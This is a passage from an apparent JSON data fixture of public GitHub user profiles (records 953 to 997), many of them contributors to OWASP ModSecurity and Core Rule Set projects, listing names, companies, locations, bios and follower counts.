"avatar_url": "https://avatars.githubusercontent.com/u/3464056?v=4", + "company": "@SlikNL ", + "location": "The Netherlands", + "collaborators_count": 0, + "following_count": 19, + "followers_count": 66, + "public_gists_count": 0, + "public_repositories_count": 9, + "created_at": "2013-02-03T15:38:43Z", + "updated_at": "2024-07-05T17:35:53Z", + "node_id": "MDQ6VXNlcjM0NjQwNTY=", + "bio": "Slik CTO / OWASP Core Rule Set co-lead", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 953, + "fields": { + "nest_created_at": "2024-09-11T22:36:50.544Z", + "nest_updated_at": "2024-09-22T19:49:06.949Z", + "name": "Chaim Sanders", + "login": "csanders-git", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/4632287?v=4", + "company": "Lyft", + "location": "Seattle, WA", + "collaborators_count": 0, + "following_count": 20, + "followers_count": 99, + "public_gists_count": 4, + "public_repositories_count": 65, + "created_at": "2013-06-06T16:17:29Z", + "updated_at": "2024-03-08T18:39:12Z", + "node_id": "MDQ6VXNlcjQ2MzIyODc=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 954, + "fields": { + "nest_created_at": "2024-09-11T22:36:59.639Z", + "nest_updated_at": "2024-09-11T22:36:59.639Z", + "name": "Waqas Ali", + "login": "void-in", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1746697?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 17, + "followers_count": 29, + "public_gists_count": 3, + "public_repositories_count": 26, + "created_at": "2012-05-16T18:33:06Z", + "updated_at": "2023-06-16T10:16:47Z", + "node_id": "MDQ6VXNlcjE3NDY2OTc=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 955, + "fields": { + "nest_created_at": "2024-09-11T22:37:03.808Z", + "nest_updated_at": "2024-09-11T22:37:03.808Z", + "name": "", + "login": "caracostea", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/7763193?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2014-06-01T22:40:30Z", + "updated_at": "2023-06-13T05:22:47Z", + "node_id": "MDQ6VXNlcjc3NjMxOTM=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 956, + "fields": { + "nest_created_at": "2024-09-11T22:37:05.115Z", + "nest_updated_at": "2024-09-11T22:37:05.115Z", + "name": "", + "login": "std0ut", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/12474585?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 4, + "created_at": "2015-05-16T15:50:56Z", + "updated_at": "2024-02-14T04:35:16Z", + "node_id": "MDQ6VXNlcjEyNDc0NTg1", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 957, + "fields": { + "nest_created_at": "2024-09-11T22:37:13.894Z", + "nest_updated_at": "2024-09-11T22:37:13.894Z", + "name": "Katherine", + "login": "katef", + "email": "kate@elide.org", + "avatar_url": "https://avatars.githubusercontent.com/u/1371085?v=4", + "company": "", + "location": "Scotland", + "collaborators_count": 0, + "following_count": 11, + "followers_count": 935, + "public_gists_count": 9, + "public_repositories_count": 24, + "created_at": "2012-01-23T14:51:47Z", + "updated_at": "2024-06-14T17:38:27Z", + "node_id": "MDQ6VXNlcjEzNzEwODU=", + "bio": "", + "is_hireable": false, + "twitter_username": "thingskatedid" + } +}, +{ + "model": "github.user", + "pk": 958, + "fields": { + "nest_created_at": "2024-09-11T22:37:18.849Z", + "nest_updated_at": "2024-09-22T19:48:59.315Z", + "name": "Christian Folini", + "login": "dune73", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/618722?v=4", + "company": "https://www.netnea.com", + "location": "Berne, Switzerland", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 86, + "public_gists_count": 10, + "public_repositories_count": 22, + "created_at": "2011-02-15T07:42:45Z", + "updated_at": "2024-09-13T12:25:28Z", + "node_id": "MDQ6VXNlcjYxODcyMg==", + "bio": "Webserver Fortification Engineer and Advisor in the Art of Defense. OWASP ModSecurity Core Rule Set Co-Lead. ", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 959, + "fields": { + "nest_created_at": "2024-09-11T22:37:20.982Z", + "nest_updated_at": "2024-09-11T22:37:20.982Z", + "name": "Meetesh Barua", + "login": "maverick64", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/6886159?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 4, + "created_at": "2014-03-07T18:33:43Z", + "updated_at": "2022-05-20T22:02:49Z", + "node_id": "MDQ6VXNlcjY4ODYxNTk=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 960, + "fields": { + "nest_created_at": "2024-09-11T22:37:23.981Z", + "nest_updated_at": "2024-09-22T18:39:20.240Z", + "name": "Tom Sommer", + "login": "tomsommer", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/149171?v=4", + "company": "Simply.com", + "location": "Denmark", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 71, + "created_at": "2009-11-05T08:21:07Z", + "updated_at": "2024-06-25T17:55:53Z", + "node_id": "MDQ6VXNlcjE0OTE3MQ==", + "bio": "Creator of Simply.com, Denmarks largest webhosting provider. \r\n\r\nHorrible perfectionist.", + "is_hireable": false, + "twitter_username": "tomsommer" + } +}, +{ + "model": "github.user", + "pk": 961, + "fields": { + "nest_created_at": "2024-09-11T22:37:28.950Z", + "nest_updated_at": "2024-09-11T22:37:28.950Z", + "name": "Vladimir Seregin", + "login": "heaviss", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/9004182?v=4", + "company": "", + "location": "Novosibirsk ", + "collaborators_count": 0, + "following_count": 30, + "followers_count": 11, + "public_gists_count": 1, + "public_repositories_count": 5, + "created_at": "2014-10-03T03:10:21Z", + "updated_at": "2024-09-05T15:49:48Z", + "node_id": "MDQ6VXNlcjkwMDQxODI=", + "bio": "", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 962, + "fields": { + "nest_created_at": "2024-09-11T22:37:37.699Z", + "nest_updated_at": "2024-09-11T22:37:37.699Z", + "name": "", + "login": "welljsjs", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/25301977?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 18, + "followers_count": 7, + "public_gists_count": 1, + "public_repositories_count": 73, + "created_at": "2017-01-23T15:23:06Z", + "updated_at": "2024-08-25T11:33:58Z", + "node_id": "MDQ6VXNlcjI1MzAxOTc3", + "bio": "Student", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 963, + "fields": { + "nest_created_at": "2024-09-11T22:37:39.715Z", + "nest_updated_at": "2024-09-11T22:37:39.715Z", + "name": "Marcel Tricolici", + "login": "mtricolici", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/717384?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 12, + "created_at": "2011-04-08T12:16:26Z", + "updated_at": "2024-07-04T14:00:07Z", + "node_id": "MDQ6VXNlcjcxNzM4NA==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 964, + "fields": { + "nest_created_at": "2024-09-11T22:37:47.572Z", + "nest_updated_at": "2024-09-11T22:37:51.058Z", + "name": "Erik van Dijk", + "login": "erikvdijk", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/45269278?v=4", + "company": "InfoProjects", + "location": "Bussum", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2018-11-22T16:59:15Z", + "updated_at": "2023-07-18T06:35:56Z", + "node_id": "MDQ6VXNlcjQ1MjY5Mjc4", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 965, + "fields": { + "nest_created_at": "2024-09-11T22:37:49.372Z", + "nest_updated_at": "2024-09-22T19:48:57.743Z", + "name": "Max Leske", + "login": "theseion", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/250711?v=4", + "company": "Xovis.com", + "location": "", + "collaborators_count": 0, + "following_count": 10, + "followers_count": 38, + "public_gists_count": 0, + "public_repositories_count": 72, + "created_at": "2010-04-23T12:24:31Z", + "updated_at": "2024-08-20T13:41:02Z", + "node_id": "MDQ6VXNlcjI1MDcxMQ==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 966, + "fields": { + "nest_created_at": "2024-09-11T22:37:53.232Z", + "nest_updated_at": "2024-09-22T18:39:09.399Z", + "name": "WGH", + "login": "WGH-", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1099351?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 29, + "public_gists_count": 16, + "public_repositories_count": 107, + "created_at": "2011-10-03T16:36:38Z", + "updated_at": "2024-05-01T14:41:58Z", + "node_id": "MDQ6VXNlcjEwOTkzNTE=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 967, + "fields": { + "nest_created_at": "2024-09-11T22:37:57.715Z", + "nest_updated_at": "2024-09-11T22:37:57.715Z", + "name": "", + "login": "jimant", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/20418597?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 5, + "created_at": "2016-07-12T11:15:16Z", + "updated_at": "2021-10-13T08:47:31Z", + "node_id": "MDQ6VXNlcjIwNDE4NTk3", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 968, + "fields": { + "nest_created_at": "2024-09-11T22:37:59.770Z", + "nest_updated_at": "2024-09-11T22:37:59.770Z", + "name": "oelnaggar", + "login": "ossie-git", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/25382296?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 5, + "followers_count": 9, + "public_gists_count": 8, + "public_repositories_count": 33, + "created_at": "2017-01-27T08:02:34Z", + "updated_at": "2024-09-10T13:00:46Z", + "node_id": "MDQ6VXNlcjI1MzgyMjk2", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 969, + "fields": { + "nest_created_at": "2024-09-11T22:38:02.213Z", + "nest_updated_at": "2024-09-11T22:38:02.213Z", + "name": "Gustavo Sampaio", + "login": "GustavoKatel", + "email": "github@gsampaio.dev", + "avatar_url": "https://avatars.githubusercontent.com/u/1891977?v=4", + "company": "@toggl", + "location": "João Pessoa, Brazil", + "collaborators_count": 0, + "following_count": 65, + "followers_count": 88, + "public_gists_count": 7, + "public_repositories_count": 123, + "created_at": "2012-06-26T00:07:12Z", + "updated_at": "2024-09-11T17:11:14Z", + "node_id": "MDQ6VXNlcjE4OTE5Nzc=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 970, + "fields": { + "nest_created_at": "2024-09-11T22:38:04.349Z", + "nest_updated_at": "2024-09-11T22:38:04.349Z", + "name": "", + "login": "jdornan", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/50336903?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2019-05-06T17:36:03Z", + "updated_at": "2019-05-06T17:36:57Z", + "node_id": "MDQ6VXNlcjUwMzM2OTAz", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 971, + "fields": { + "nest_created_at": "2024-09-11T22:38:06.886Z", + "nest_updated_at": "2024-09-12T02:27:07.538Z", + "name": "", + "login": "rainerjung", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/701263?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 1, + "public_repositories_count": 18, + "created_at": "2011-03-31T10:01:59Z", + "updated_at": "2021-07-29T11:33:50Z", + "node_id": "MDQ6VXNlcjcwMTI2Mw==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 972, + "fields": { + "nest_created_at": "2024-09-11T22:38:09.785Z", + "nest_updated_at": "2024-09-11T22:38:09.785Z", + "name": "", + "login": "markblackman", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/16478758?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 6, + "followers_count": 5, + "public_gists_count": 0, + "public_repositories_count": 8, + "created_at": "2015-12-29T16:27:09Z", + "updated_at": "2024-08-30T14:35:23Z", + "node_id": "MDQ6VXNlcjE2NDc4NzU4", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 973, + "fields": { + "nest_created_at": "2024-09-11T22:38:12.269Z", + "nest_updated_at": "2024-09-22T19:48:17.879Z", + "name": "Federico G. Schwindt", + "login": "fgsch", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/241785?v=4", + "company": "", + "location": "Cambridgeshire, UK", + "collaborators_count": 0, + "following_count": 38, + "followers_count": 90, + "public_gists_count": 3, + "public_repositories_count": 45, + "created_at": "2010-04-11T22:10:45Z", + "updated_at": "2024-09-03T11:21:04Z", + "node_id": "MDQ6VXNlcjI0MTc4NQ==", + "bio": "Code makes me happy.", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 974, + "fields": { + "nest_created_at": "2024-09-11T22:38:13.460Z", + "nest_updated_at": "2024-09-11T22:38:13.460Z", + "name": "Anat (Fox) Davidi", + "login": "afoxdavidi", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/51437167?v=4", + "company": "Trustwave @SpiderLabs", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 6, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2019-06-06T07:35:16Z", + "updated_at": "2024-08-24T11:31:59Z", + "node_id": "MDQ6VXNlcjUxNDM3MTY3", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 975, + "fields": { + "nest_created_at": "2024-09-11T22:38:15.108Z", + "nest_updated_at": "2024-09-22T18:39:13.593Z", + "name": "Mirko Dziadzka", + "login": "mirkodziadzka-avi", + "email": "mdziadzka@vmware.com", + "avatar_url": "https://avatars.githubusercontent.com/u/29118782?v=4", + "company": "@avinetworks - now part of @vmware", + "location": "Regensburg, Germany", + "collaborators_count": 0, + "following_count": 8, + "followers_count": 5, + "public_gists_count": 0, + "public_repositories_count": 6, + "created_at": "2017-06-01T09:17:34Z", + "updated_at": "2024-09-18T15:15:20Z", + "node_id": "MDQ6VXNlcjI5MTE4Nzgy", + "bio": "Developer at @avinetworks - now part of @vmware.\r\n\r\nApp Security and Web Application Firewall (WAF).\r\n\r\nFor my personal account, see @MirkoDziadzka", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 976, + "fields": { + "nest_created_at": "2024-09-11T22:38:16.754Z", + "nest_updated_at": "2024-09-22T19:48:17.553Z", + "name": "Ervin Hegedus", + "login": "airween", + "email": "airween@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/238977?v=4", + "company": "Digitalwave Ltd.", + "location": "Hungary", + "collaborators_count": 0, + "following_count": 15, + "followers_count": 22, + "public_gists_count": 25, + "public_repositories_count": 30, + "created_at": "2010-04-07T19:21:44Z", + "updated_at": "2024-09-03T05:40:07Z", + "node_id": "MDQ6VXNlcjIzODk3Nw==", + "bio": "Whitespace makes me happy.", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 977, + "fields": { + "nest_created_at": "2024-09-11T22:38:17.532Z", + "nest_updated_at": "2024-09-22T18:39:03.579Z", + "name": "", + "login": "martinhsv", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/55407942?v=4", + "company": "Trustwave Spiderlabs", + "location": "Canada", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 76, + "public_gists_count": 1, + "public_repositories_count": 4, + "created_at": "2019-09-16T18:02:09Z", + "updated_at": "2024-01-25T19:23:51Z", + "node_id": "MDQ6VXNlcjU1NDA3OTQy", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 978, + "fields": { + "nest_created_at": "2024-09-11T22:38:18.867Z", + "nest_updated_at": "2024-09-11T22:38:18.867Z", + "name": "khushbu", + "login": "khushbuparakh", + "email": "khushbuparakh@hotmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/7480669?v=4", + "company": "founder of @sos, mentor @systers, intern @avinetworks ", + "location": "Dallas, Texas", + "collaborators_count": 0, + "following_count": 71, + "followers_count": 50, + "public_gists_count": 2, + "public_repositories_count": 41, + "created_at": "2014-05-04T14:15:30Z", + "updated_at": "2024-02-27T21:18:07Z", + "node_id": "MDQ6VXNlcjc0ODA2Njk=", + "bio": "Studying Computer Science at SMU Dallas. Specialization in Cybersecurity, FOSS passionate.", + "is_hireable": true, + "twitter_username": "cokencode" + } +}, +{ + "model": "github.user", + "pk": 979, + "fields": { + "nest_created_at": "2024-09-11T22:38:23.046Z", + "nest_updated_at": "2024-09-11T22:38:23.046Z", + "name": "Matthias Hörmann", + "login": "taladar", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/21060?v=4", + "company": "", + "location": "Germany", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 8, + "public_gists_count": 3, + "public_repositories_count": 56, + "created_at": "2008-08-18T19:00:54Z", + "updated_at": "2023-10-17T20:35:30Z", + "node_id": "MDQ6VXNlcjIxMDYw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 980, + "fields": { + "nest_created_at": "2024-09-11T22:38:24.803Z", + "nest_updated_at": "2024-09-11T22:38:24.803Z", + "name": "", + "login": "arjunvrm", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/38151635?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2018-04-07T06:25:33Z", + "updated_at": "2019-10-25T09:00:58Z", + "node_id": "MDQ6VXNlcjM4MTUxNjM1", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 981, + "fields": { + "nest_created_at": "2024-09-11T22:38:26.415Z", + "nest_updated_at": "2024-09-11T22:38:26.415Z", + "name": "", + "login": "jwillberg", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/20167537?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2016-06-27T12:51:51Z", + "updated_at": "2024-02-28T09:43:52Z", + "node_id": "MDQ6VXNlcjIwMTY3NTM3", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 982, + "fields": { + "nest_created_at": "2024-09-11T22:38:28.153Z", + "nest_updated_at": "2024-09-11T22:38:28.153Z", + "name": "Daniel Townend", + "login": "dto20", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/44569992?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2018-10-29T09:54:00Z", + "updated_at": "2021-12-07T11:49:22Z", + "node_id": "MDQ6VXNlcjQ0NTY5OTky", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 983, + "fields": { + "nest_created_at": "2024-09-11T22:38:31.035Z", + "nest_updated_at": "2024-09-11T22:38:31.035Z", + "name": "Nikita Mashnyaga", + "login": "slinikma", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/23367943?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 7, + "created_at": "2016-11-09T22:19:28Z", + "updated_at": "2024-06-02T18:52:48Z", + "node_id": "MDQ6VXNlcjIzMzY3OTQz", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 984, + "fields": { + "nest_created_at": "2024-09-11T22:38:32.712Z", + "nest_updated_at": "2024-09-22T19:48:41.981Z", + "name": "", + "login": "jeremyjpj0916", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/31913027?v=4", + "company": "Optum", + "location": "South Carolina", + "collaborators_count": 0, + "following_count": 5, + "followers_count": 13, + "public_gists_count": 0, + "public_repositories_count": 44, + "created_at": "2017-09-13T05:04:38Z", + "updated_at": "2024-08-12T00:32:52Z", + "node_id": "MDQ6VXNlcjMxOTEzMDI3", + "bio": "Always enjoy tinkering in some code. ", + "is_hireable": false, + "twitter_username": "jeremyj0916" + } +}, +{ + "model": "github.user", + "pk": 985, + "fields": { + "nest_created_at": "2024-09-11T22:38:36.478Z", + "nest_updated_at": "2024-09-22T19:48:38.117Z", + "name": "", + "login": "Steve8291", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/17433692?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 3, + "public_gists_count": 0, + "public_repositories_count": 17, + "created_at": "2016-02-23T15:48:05Z", + "updated_at": "2024-07-30T17:38:37Z", + "node_id": "MDQ6VXNlcjE3NDMzNjky", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 986, + "fields": { + "nest_created_at": "2024-09-11T22:38:38.115Z", + "nest_updated_at": "2024-09-11T22:38:38.115Z", + "name": "", + "login": "mmelo-yottaa", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/47983969?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 1, + "public_repositories_count": 3, + "created_at": "2019-02-25T15:45:36Z", + "updated_at": "2024-09-03T12:04:14Z", + "node_id": "MDQ6VXNlcjQ3OTgzOTY5", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 987, + "fields": { + "nest_created_at": "2024-09-11T22:38:39.721Z", + "nest_updated_at": "2024-09-11T22:38:39.721Z", + "name": "Rafael Lima Joia", + "login": "rljoia", + "email": "rljoia@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/6485356?v=4", + "company": "xGeeks", + "location": "Porto, Portugal", + "collaborators_count": 0, + "following_count": 6, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 8, + "created_at": "2014-01-23T20:20:57Z", + "updated_at": "2023-12-29T11:23:06Z", + "node_id": "MDQ6VXNlcjY0ODUzNTY=", + "bio": "Software Engineer", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 988, + "fields": { + "nest_created_at": "2024-09-11T22:38:41.792Z", + "nest_updated_at": "2024-09-11T22:38:41.792Z", + "name": "", + "login": "jatgh", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1170520?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2011-11-03T18:34:26Z", + "updated_at": "2024-05-07T19:53:27Z", + "node_id": "MDQ6VXNlcjExNzA1MjA=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 989, + "fields": { + "nest_created_at": "2024-09-11T22:38:44.299Z", + "nest_updated_at": "2024-09-11T22:38:44.299Z", + "name": "Paul Charlton", + "login": "PaulCharlton", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1747363?v=4", + "company": "Results ByIQ LLC", + "location": "Maui", + "collaborators_count": 0, + "following_count": 7, + "followers_count": 7, + "public_gists_count": 1, + "public_repositories_count": 109, + "created_at": "2012-05-16T23:00:54Z", + "updated_at": "2024-09-11T21:40:46Z", + "node_id": "MDQ6VXNlcjE3NDczNjM=", + "bio": "I love delivering results that transform businesses into sustainable market leadership.", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 990, + "fields": { + "nest_created_at": "2024-09-11T22:38:48.664Z", + "nest_updated_at": "2024-09-11T22:38:48.664Z", + "name": "", + "login": "unix196", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/10706486?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 1, + "public_repositories_count": 15, + "created_at": "2015-01-26T09:50:25Z", + "updated_at": "2023-10-06T05:18:36Z", + "node_id": "MDQ6VXNlcjEwNzA2NDg2", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 991, + "fields": { + "nest_created_at": "2024-09-11T22:38:49.952Z", + "nest_updated_at": "2024-09-11T22:38:49.952Z", + "name": "", + "login": "ralfmeister", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/68286481?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2020-07-14T14:03:11Z", + "updated_at": "2023-12-13T09:20:28Z", + "node_id": "MDQ6VXNlcjY4Mjg2NDgx", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 992, + "fields": { + "nest_created_at": "2024-09-11T22:38:51.607Z", + "nest_updated_at": "2024-09-11T22:38:51.607Z", + "name": "Daniel Sedlak", + "login": "wutchzone", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/21202801?v=4", + "company": "CDN77", + "location": "Prague", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 5, + "public_gists_count": 2, + "public_repositories_count": 51, + "created_at": "2016-08-23T17:14:07Z", + "updated_at": "2024-08-28T12:29:05Z", + "node_id": "MDQ6VXNlcjIxMjAyODAx", + "bio": "Go, Rust, C/C++ programmer with a love for system programming, IoT, and 3D printing.", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 993, + "fields": { + "nest_created_at": "2024-09-11T22:38:54.076Z", + "nest_updated_at": "2024-09-11T22:38:55.703Z", + "name": "", + "login": "drmuey", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1204812?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 3, + "public_gists_count": 20, + "public_repositories_count": 55, + "created_at": "2011-11-18T16:17:53Z", + "updated_at": "2024-06-17T15:17:14Z", + "node_id": "MDQ6VXNlcjEyMDQ4MTI=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 994, + "fields": { + "nest_created_at": "2024-09-11T22:38:59.153Z", + "nest_updated_at": "2024-09-22T19:48:21.138Z", + "name": "Simon Studer", + "login": "studersi", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/6496203?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 5, + "followers_count": 5, + "public_gists_count": 0, + "public_repositories_count": 32, + "created_at": "2014-01-24T23:03:22Z", + "updated_at": "2024-09-10T10:22:42Z", + "node_id": "MDQ6VXNlcjY0OTYyMDM=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 995, + "fields": { + "nest_created_at": "2024-09-11T22:39:00.893Z", + "nest_updated_at": "2024-09-11T22:39:00.893Z", + "name": "", + "login": "satchidipu174", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/46513294?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 13, + "created_at": "2019-01-09T04:45:27Z", + "updated_at": "2024-01-19T22:38:06Z", + "node_id": "MDQ6VXNlcjQ2NTEzMjk0", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 996, + "fields": { + "nest_created_at": "2024-09-11T22:39:02.569Z", + "nest_updated_at": "2024-09-11T22:39:02.569Z", + "name": "", + "login": "amorozkin", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/45874511?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2018-12-14T11:41:29Z", + "updated_at": "2024-02-14T18:12:57Z", + "node_id": "MDQ6VXNlcjQ1ODc0NTEx", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 997, + "fields": { + "nest_created_at": "2024-09-11T22:39:06.360Z", + "nest_updated_at": "2024-09-22T18:39:13.927Z", + "name": "", + "login": "Minasu", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/16954154?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 7, + "created_at": "2016-01-29T09:11:36Z", + "updated_at": 